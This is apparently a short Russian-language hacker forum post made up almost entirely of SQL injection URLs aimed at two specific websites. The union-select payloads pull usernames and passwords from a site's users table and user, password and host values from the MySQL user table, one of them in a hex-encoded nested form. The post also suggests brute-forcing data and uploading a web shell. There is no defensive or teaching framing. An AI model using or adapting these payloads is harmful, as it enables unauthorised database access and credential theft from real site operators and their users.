а нужны данные из базы - только брут. Например SIPT4

http://www.yivo.org/index.php?tid=1+and+null+union+select+1,2,3,userna me,5,password,7,8,9+from+users/*

и вообще лей шелл

http://www.yivo.org/index.php?tid=1+and+null+union+select+1,2,3,4,5,6, 7,0x2d312920756e696f6e2073656c65637420312c322c332c 342c352c362c372c5c27785c272c392c31302c31312c31322c 31332c31342c31352c31362c31372c31382c31392c32302c32 312c32322c32332c32342c32352c32362c32372c32382c3239 2c33302c33312c33322c33332c33342c33352c33362c33372c 33382c33392c33302c34312c34322c34332c34352c34362c34 372c34382c34392c35302c35312c35322c35332c35342c3535 2c35362c35372c35382c35392c36302c36312c36322c36332c 36342c36352c36362c36372c36382c36392c37302c37312f2a ,9/*

http://www.auto24team.de/index.php?who=9999+union+select+1,1,concat_ws(0x3a ,user,password,host),1,1,1,1,1, 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1, 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1, 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1, 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1, 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1, 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1, 1,1,1,1,1, 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1, 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1, 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1, 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1, 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1, 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1, 1,1,1,1,1, 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1, 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1, 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1, 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1, 1+from+mysql.user+limit+1,1--+